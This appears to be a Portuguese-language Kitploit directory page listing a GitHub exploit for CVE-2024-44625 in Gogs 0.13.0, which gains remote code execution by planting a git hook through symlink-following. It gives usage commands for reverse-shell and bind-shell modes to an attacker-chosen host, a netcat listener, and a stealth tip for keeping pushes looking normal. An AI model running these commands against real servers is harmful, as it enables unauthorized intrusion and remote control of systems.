Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-44625-Gogs-RCE-0.13.0 — Exploit para CVE-2024-44625 no Gogs 0.13.0, alcançando execução remota de código via symlink-follow para criar um git hook, com modos de shell reverso e bind. | Kitploit
Ferramentas/GitHubGitHub/batj44/cve-2024-44625-gogs-rce-0.13.0
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads
GitHubbatj44/cve-2024-44625-gogs-rce-0.13.0

CVE-2024-44625-Gogs-RCE-0.13.0

Exploit para CVE-2024-44625 no Gogs 0.13.0, alcançando execução remota de código via symlink-follow para criar um git hook, com modos de shell reverso e bind.

Ver Repositório
há 1 diaAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-44625 & Gogs-RCE-0.13.0

Validado contra um Gogs da era 0.13.0 atrás de um proxy reverso. Primitiva: symlink-follow do editor web para um .git/hooks/pre-receive AUSENTE cria esse arquivo (executável). Todo push subsequente para o repositório o executa.

Uso:

Reverse shell (execute o listener primeiro: nc -lvnp 4444)

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode reverse --lhost <YOUR_IP> --lport 4444

Bind shell (depois conecte: nc )

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
    --mode bind --bind-port 5555

Re-disparar hook existente (repositório já envenenado) sem replantar:

root@kitploit:~
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \ --mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3

Notas:

  • O repositório é um NOVO descartável criado sob --owner (padrão: --user).
  • O caminho do hook é derivado de --root (padrão /data/git/gogs-repositories, Docker).
  • exit 0 mantém os pushes com aparência normal (sem erro de "hook declined").
Baixar ferramenta